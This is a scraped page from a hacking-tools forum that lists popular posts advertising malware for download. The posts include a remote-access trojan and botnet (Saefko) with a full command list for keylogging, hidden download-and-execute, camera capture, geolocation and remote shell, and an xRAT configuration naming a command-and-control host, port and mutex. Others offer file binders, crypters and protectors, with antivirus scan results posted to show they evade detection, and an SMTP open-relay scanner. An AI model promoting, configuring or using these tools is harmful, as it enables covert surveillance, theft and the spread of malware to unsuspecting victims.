Jump to content
LeVeL23HackTools
  • Sign Up

Leaderboard


Popular Content

Showing content with the highest reputation on 08/13/2019 in all areas

  1. 2 points
    Saefko Attack Systems the most advance RAT-BOT-AGENT ever created This is "a multi protocol multi operating system" remote administration tool , This is the first system to use three protocols establishing all time communication , there is four main thing this design provides that no other system provide first Unlimited number of machines to control. Extreme reliability. Android and Windows control at the same time. No port forwarding. No mysql. This project was designed to replace all RAT/BOTS that are made to control remote machine,the problem with all current RATS/BOTS that they are unreliable and limited , you cant in 99.9% of the time have more than 100 machine or victim due to self flooding , self flooding meaning when the client connect to the server directly "when the rat connect to the attacker pc through TCP" . When the number of connected clients increased this acte as flood attack, so you will be limited to some low number and you will end up with lagy unreliable connection to the target machines. That's from the side of TCP rats the other side is the http bots ,that use a remote server containing some php scripts and mysql server , this design can handle unlimited number of machines in theory , but the problem with this design is that you do not have a direct connection to the machine so you are limited to http tasks and this dose not give you much control so that was just a quick short overview on some of extreme problems that RATS/BOTS facing with current techs,in Saefko Attack Systems "SAS" you combining both of these types of connections and adding IRC Protocol to the mix you will end up with extremely reliable connection to the target machine,SAS will handle millions of connections with direct TCP communications established through IRC networks any time any place all wither. Fast Setup Youtube : Main Windows Public HTTP Tasks Windows Build Android Build Command And Control Sections Android Command And Control Sections Android IRC Commands ANDROID COMMANDS [msg] Show toast message. [dexe] Download and execute a file in visible mode eg : 'dexe [Hidden Content]'. [hdexe] Download and execute a file in hidden mode eg : 'dexe [Hidden Content]'. [vistpage] Vist a webpage in visible mode eg : 'vistpage [Hidden Content]'. [hvistpage] Vist a webpage in hidden mode eg : 'hvistpage [Hidden Content]'. [snapshot] Get snapshot from camera eg : 'snapshot CAMERA_INDEX'. [ping] Ping the agent machine to check if still active. [location] Get geo location information based on 'ipinfo.com'. [flashon] Turn the dvice flash on. [flashoff] Turn the dvice flash on. [wakeup] Turn dvice screen on. [screenshot] Take a screenshot to from the target machine. GENERAL COMMANDS [clear] Clear the terminal. [opacity] Change the transparency of the terminal eg : 'opacity 0.4'. [myip] Show your public ip address that currently in use. [showtcpport] Show the public port used for TCP communications. [fontcolor] Change the font color eg : 'fontcolor #FFFFFF'. [ping] Ping the agent machine to check if still active. [info] Tells the agent to identify its machine and return short informations about it. [CTRL + C] CTRL + C to cancel any previous commands. [flashoff] Turn the dvice flash on. [cleanup] Close all windows that created by this control uint. [retcp] Order the TCP agent to reconnect , this command used in case of TCP connection is disconnected. [exit] Close the current agent window. Android TCP Commands Android Private HTTP Tasks HTTP Tasks Types Download And execute Show Message Box Visit Website Shell Commands Now Windows Command And Control Windows IRC Commands WINDOWS COMMANDS [pwd] Show current directory. [screenshot] Take a screenshot to from the target machine. [opencd] Open cd rom. [closecd] Close cd rom. [ping] Ping the agent machine to check if still active. [camlist] Get a list of available camera devices. [snapshot] Get snapshot from camera eg : 'snapshot CAMERA_INDEX'. [location] Get geo location information based on 'ipinfo.com'. [opencd] Open cd rom. [keylogs] Get agent saved keylogs through HTTP drop point. [shell] Run shell commands. [dexe] Download and execute a file in visible mode eg : 'dexe [Hidden Content]'. [hdexe] Download and execute a file in hidden mode eg : 'dexe [Hidden Content]'. [vistpage] Vist a webpage in visible mode eg : 'vistpage [Hidden Content]'. [hvistpage] Vist a webpage in hidden mode eg : 'hvistpage [Hidden Content]'. [uninstall] Uninstall the agent completely from the target machine. GENERAL COMMANDS [clear] Clear the terminal. [opacity] Change the transparency of the terminal eg : 'opacity 0.4'. [myip] Show your public ip address that currently in use. [showtcpport] Show the public port used for TCP communications. [fontcolor] Change the font color eg : 'fontcolor #FFFFFF'. [ping] Ping the agent machine to check if still active. [info] Tells the agent to identify its machine and return short informations about it. [CTRL + C] CTRL + C to cancel any previous commands. [flashoff] Turn the dvice flash on. [cleanup] Close all windows that created by this control uint. [retcp] Order the TCP agent to reconnect , this command used in case of TCP connection is disconnected. [exit] Close the current agent window. Windows TCP Commands Windows Private HTTP Tasks HTTP Tasks Types Download And execute Show Message Box Visit Website Shell Commands Download: [Hidden Content]
  2. 2 points
    Download here [Hidden Content]
  3. 1 point
    Download: [HIDE][Hidden Content]] Password: level23hacktools.com
  4. 1 point
    Download: [HIDE][Hidden Content]] Password: level23hacktools.com
  5. 1 point
  6. 1 point
    [HIDE] [Hidden Content]]
  7. 1 point
  8. 1 point
    Proxies:Yes Email:pass Bots: 50 [HIDE][Hidden Content]]
  9. 1 point
    [Hidden Content]
  10. 1 point
    Speed SMTP Scanner is a fast SMTP scanner that scans a specified range of IP addresses and looks for SMTP, which allows you to send email without authorization. ]
  11. 1 point
    CQURE Team has prepared tools used during penetration testing and packed those in a toolkit named CQTools. This toolkit allows to deliver complete attacks within the infrastructure, starting with sniffing and spoofing activities, going through information extraction, password extraction, custom shell generation, custom payload generation, hiding code from antivirus solutions, various keyloggers and leverage this information to deliver attacks. Some of the tools are based on discoveries that were released to the world for the first time by CQURE Team. CQURE was the first team that did full reverse engineering of DPAPI (Data Protection Application Programming Interface) and prepared the first public tool that allows monitoring WSL (Windows Subsystem for Linux) feature. This toolkit allows you to deliver complete attacks within the infrastructure, starting with sniffing and spoofing activities, going through information extraction, password extraction, custom shell generation, custom payload generation, hiding code from antivirus solutions, various keyloggers and leverage this information to deliver attacks. Some of the tools are based on discoveries that were released to the world for the first time by CQURE Team; some of the tools took years to complete, and all of the tools work in a straightforward manner. CQTools is the ultimate toolkit to have when delivering a penetration test. The tools work simply, and we use them in practice during our cybersecurity assignments. Come and have a look at how our CQTools can boost your penetration testing experience! [Hidden Content]
  12. 1 point
    Download: [HIDE][Hidden Content]] Password: level23hacktools.com
  13. 1 point
    [Hidden Content] Server.exe [Hidden Content] [Hidden Content] Pass: PM me! huh
  14. 1 point
    [HIDE][Hidden Content]]
  15. 1 point
    Seafko Rat 3.9 General Features Download: [Hidden Content]
  16. 1 point
    Download: [HIDE][Hidden Content]] Password: level23hacktools.com
  17. 1 point
    Viotto Binder Join multiple files into one, and create installation packages. Free and open source, coded in VB6. Key Features: Bind together any number and type of file into one executable Function to compress each file separately before binding, using UPX packer Tiny stub size: 12 kb Simple, compact, reliable and OpenSource. Compatible from WinXP to Win10 Seven default drop paths, or custom path: ~ Application path (where dropper gets executed) ~ Temp (C:\Documents and settings\Username\Local settings\Temp) ~ Root (C:) ~ Windows (C:\Windows) ~ System32 (C:\Windows\system32) ~ ProgramFiles (C:\Program files) ~ AppData (C:\Documents and settings\Username\Application Data) ~ Custom Download: [hide][Hidden Content]] Password: level23hacktools.com Download Soure:
  18. 1 point
  19. 1 point
    Download: [hide][Hidden Content]] Password: level23hacktools.com
  20. 1 point
    Green Binder by 14bs/nateko Windows XP SP1 x64 OK Windows XP SP2 x86 OK Windows XP SP2 x64 OK Windows XP SP3 OK Windows Vista x86 OK Windows Vista x64 OK Windows 7 x64 OK Windows 7 x86 OK Windows 8 x64 OK Windows 8 x86 OK Windows 8.1 x64 OK Windows 8.1 x86 OK Windows 10 x86 OK Windows 10 x64 OK Binded Files Название файла: Binded.exe Размер файла: 55399 байт Дата сканирования: Wed, 03 Aug 16 08:45:51 +0200 MD5-хэш файла: 2c2551583bdb284a7247ae6527870bde Результат: 0 из 41 Ad-Aware: OK AhnLab V3 Internet Security: OK ArcaVir: OK Avast: OK AVG: OK AVG Internet Security 2016: OK Avira: OK Bitdefender/BullGuard: OK BullGuard Internet Security 2013: OK ClamAV (UNIX version): OK Comodo: OK Dr.Web: OK Emsisoft Anti-Malware (a-squared Anti-Malware): OK eScan Internet Security Suite 14: OK ESET Nod32 v9: OK Fortinet 5: OK F-Prot: OK F-Secure 2014: OK G Data: OK IKARUS: OK Immunet: OK K7 Ultimate: OK Kaspersky Total Security 2015: OK Malware bytes: OK McAfee Total Protection 2013: OK Microsoft Security Essentials: OK NANO: OK NOD32: OK Norman: OK Norton Internet Security: OK Outpost Security Suite Pro 8.0: OK Panda Antivirus: OK Quick Heal: OK Sophos: OK SUPERAntiSpyware: OK Total Defense Internet Security: OK Trendmicro Titanium Internet Security: OK Twister Antivirus 8: OK VBA: OK VIPRE Internet Security 2013: OK Virit: OK Scan report generated by Scanner.FuckAV.ru Pass: RAR Archive (Krypton pass:00110011 ) [HIDE-THANKS] [Hidden Content]] Scanned By Anarchy. CLEAN.
  21. 1 point
    Real-time Software Protection Private exe Protector (PEP) is a professional software copy protection and license management. PEP works with traditional methods, such as file compression, code fragment encryption, metamorphic loading, protection from debugging and file tampering, and features new innovative techniques like data protection with stolen resources technique. All in one, it is the ideal solution for software developers. Main functions: Encryption, compression, protection and hardware-locked licensing (x32, x64 and soon .NET). Reliable protection of software against debugging, reverse engineering and other hazards. Complete control and flexibility of the protection option's set-up and configuration. License Activation Center (server) with real-time control of user accounts: do with your users what ever you want - limit usage by: hardware, activations count, dates, executions count etc. License Activation Center support unlimited count of projects and users, work as standalone application on any Windows with .NET framework v.4.5.1 or Linux with MONO. Functions execution on server side(in License Activation Center) and returns result to application (supports call from native dll, .NET dll and web-link) Regular and significant updates of the protector, no ANTIVIRUS "FALSE ALERTS". Support of all common programming languages from assembler, Delphi, C, etc. to script languages, such as AutoIt, Python, Qt, Blitz3d etc. Complete compatibility with any NT system: x32/x64 (XP, Vista, 7-10 etc.), even with Linux (wine) [HIDE-THANKS][Hidden Content]]
  22. 1 point
    Image Stub Filename: Stub.exe Type: File Filesize: 45568 bytes Date: 27/08/2015 - 23:24 GMT+2 MD5: c08fed41b52fb5e370ee07bfcf8c5a2e SHA1: fdf2eb05d11e70a849fb3c8902c8c4799226ff3d Status: Clean Result: 0/35 AVG Free - OK Avast - OK AntiVir (Avira) - OK BitDefender - OK Clam Antivirus - OK COMODO Internet Security - OK Dr.Web - OK eTrust-Vet - OK F-PROT Antivirus - OK F-Secure Internet Security - OK G Data - OK IKARUS Security - OK Kaspersky Antivirus - OK McAfee - OK MS Security Essentials - OK ESET NOD32 - OK Norman - OK Norton Antivirus - OK Panda Security - OK A-Squared - OK Quick Heal Antivirus - OK Solo Antivirus - OK Sophos - OK Trend Micro Internet Security - OK VBA32 Antivirus - OK Zoner AntiVirus - OK Ad-Aware - OK BullGuard - OK FortiClient - OK K7 Ultimate - OK NANO Antivirus - OK Panda CommandLine - OK SUPERAntiSpyware - OK Twister Antivirus - OK VIPRE - OK Scan Result: [Hidden Content] Scan by MaJyx Scanner Bolita + Ressource Hacker Filename: Bolita + Ressorsse Hacker.exe Type: File Filesize: 1120363 bytes Date: 27/08/2015 - 23:02 GMT+2 MD5: a5c57da22e48b619897d014b1ec0e3c4 SHA1: 42c672d7e13e3d29ea3e50403731c2bc9139cd09 Status: Clean Result: 0/35 AVG Free - OK Avast - OK AntiVir (Avira) - OK BitDefender - OK Clam Antivirus - OK COMODO Internet Security - OK Dr.Web - OK eTrust-Vet - OK F-PROT Antivirus - OK F-Secure Internet Security - OK G Data - OK IKARUS Security - OK Kaspersky Antivirus - OK McAfee - OK MS Security Essentials - OK ESET NOD32 - OK Norman - OK Norton Antivirus - OK Panda Security - OK A-Squared - OK Quick Heal Antivirus - OK Solo Antivirus - OK Sophos - OK Trend Micro Internet Security - OK VBA32 Antivirus - OK Zoner AntiVirus - OK Ad-Aware - OK BullGuard - OK FortiClient - OK K7 Ultimate - OK NANO Antivirus - OK Panda CommandLine - OK SUPERAntiSpyware - OK Twister Antivirus - OK VIPRE - OK Scan Result: [Hidden Content] Scan by MaJyx Scanner Encryptado Bozok + bolita Filename: Bozok + bolita.exe Type: File Filesize: 209941 bytes Date: 27/08/2015 - 23:21 GMT+2 MD5: 98e0403d7f9d5533b110076c710808f6 SHA1: 597a7814e2568f3de53c56f2acc799e82091ccb9 Status: Infected Result: 1/35 AVG Free - OK Avast - OK AntiVir (Avira) - TR/Dropper.Gen BitDefender - OK Clam Antivirus - OK COMODO Internet Security - OK Dr.Web - OK eTrust-Vet - OK F-PROT Antivirus - OK F-Secure Internet Security - OK G Data - OK IKARUS Security - OK Kaspersky Antivirus - OK McAfee - OK MS Security Essentials - OK ESET NOD32 - OK Norman - OK Norton Antivirus - OK Panda Security - OK A-Squared - OK Quick Heal Antivirus - OK Solo Antivirus - OK Sophos - OK Trend Micro Internet Security - OK VBA32 Antivirus - OK Zoner AntiVirus - OK Ad-Aware - OK BullGuard - OK FortiClient - OK K7 Ultimate - OK NANO Antivirus - OK Panda CommandLine - OK SUPERAntiSpyware - OK Twister Antivirus - OK VIPRE - OK Scan Result: [Hidden Content] Scan by MaJyx Scanner File is Clean By Darvin dowload [hide][Hidden Content]] REX | BYNARY | >0011010000110001001000000011011100110000001000000011011100110010001000000011011001000110001000000011011000110011001000000011011000110101001000000011011000111001001000000011011100110100001000000011011000110001001000000011010100110001001000000011011100110101001000000011011000110101001000000011011000110001001000000011011001000100001000000011011000110001001000000011011001000100001000000011011000110001001000000011011000110100001000000011011000110101001000000011011000111001001000000011011100110010001000000011011000110001001000000011011100110100001000000011011000110001001000000011011000110011001000000011011000111000001000000011011000110101001000000011011000111001001000000011011000110001
  23. 1 point
    Credits: Rottweiler settings.json example: >{ "EncryptionKey" : "QklUV8vjKCfPoOYpn1JV", "Header" : "[xRAT settings unpacked using xUnpack]", "Hosts" : [ { "Host" : "192.168.1.76", "Port" : 4782 } ], "InstallName" : "Client.exe", "InstallSub" : "SubDir", "Mutex" : "MuHufjJLddVNSbzON0", "Password" : "1234", "StartupKey" : "Client Startup", "Tag" : "Office04", "Version" : "2.0.0.0 RELEASE4.1" } Download: [HIDE-THANKS][Hidden Content]] Password: level23hacktools.com
  24. 1 point
    Mini LvL-23 Protector [0/35] CYBERGATE: Link : [Hidden Content] Passowrd :LvL-23 smil137
  25. 1 point
    Ninja Binder By XoDiAK Client Scan Filename: Ninja Binder.exe Type: File Filesize: 74752 bytes Date: 30/01/2015 - 23:16 GMT+2 MD5: e672374ccdc6d44872e144640dbb953b SHA1: b0e08f41a251f63fc154a1f351d4d15e264e71e6 Status: Infected Result: 4/35 AVG Free - OK Avast - OK AntiVir (Avira) - TR/Dropper.MSIL.Gen BitDefender - OK Clam Antivirus - OK COMODO Internet Security - OK Dr.Web - Trojan.DownLoader10.44877 eTrust-Vet - OK F-PROT Antivirus - OK F-Secure Internet Security - OK G Data - OK IKARUS Security - OK Kaspersky Antivirus - OK McAfee - OK MS Security Essentials - OK ESET NOD32 - Trojan.MSIL/TrojanDropper.Agent.LY Norman - OK Norton Antivirus - OK Panda Security - OK A-Squared - OK Quick Heal Antivirus - OK Solo Antivirus - OK Sophos - OK Trend Micro Internet Security - OK VBA32 Antivirus - OK Zoner AntiVirus - OK Ad-Aware - OK BullGuard - OK FortiClient - OK K7 Ultimate - OK NANO Antivirus - OK Panda CommandLine - OK SUPERAntiSpyware - OK Twister Antivirus - Suspicious:Trojan.FF250020400000000.mg VIPRE - OK Scan Result: [Hidden Content] Scan by MaJyx Scanner Njrat Servers Scan Filename: Binded [NjRat Servers].exe Type: File Filesize: 104202 bytes Date: 30/01/2015 - 23:19 GMT+2 MD5: aeade351052a99ce1d43952318615735 SHA1: c15b791a319ad18c1544c11deb0758e204642b68 Status: Infected Result: 7/35 AVG Free - OK Avast - MSIL:GenMalicious-ZC [Trj] AntiVir (Avira) - TR/Dropper.Gen BitDefender - OK Clam Antivirus - OK COMODO Internet Security - OK Dr.Web - OK eTrust-Vet - OK F-PROT Antivirus - OK F-Secure Internet Security - Packed:W32/DonutCrypt.A G Data - OK IKARUS Security - OK Kaspersky Antivirus - OK McAfee - OK MS Security Essentials - OK ESET NOD32 - Trojan.MSIL/TrojanDropper.Agent.LY Norman - OK Norton Antivirus - OK Panda Security - OK A-Squared - OK Quick Heal Antivirus - OK Solo Antivirus - OK Sophos - OK Trend Micro Internet Security - OK VBA32 Antivirus - infected Malware-Cryptor.MSIL.gen.5 Zoner AntiVirus - OK Ad-Aware - OK BullGuard - OK FortiClient - OK K7 Ultimate - OK NANO Antivirus - Trojan.Win32.DownLoader11.dkkgoy Panda CommandLine - OK SUPERAntiSpyware - OK Twister Antivirus - Suspicious:Trojan.FF250020400000000.mg VIPRE - OK Scan Result: [Hidden Content] Scan by MaJyx Scanner [VERDE]Files are Clean[/VERDE] Analyzed by you2004975 This Is My First Binder Sry Not Good So Much :( Binder Is 100% Work :) Download Link: [HIDE][Hidden Content]] Password: XoDiAK
×

Important Information

We have placed cookies on your device to help make this website better. You can adjust your cookie settings, otherwise we'll assume you're okay to continue.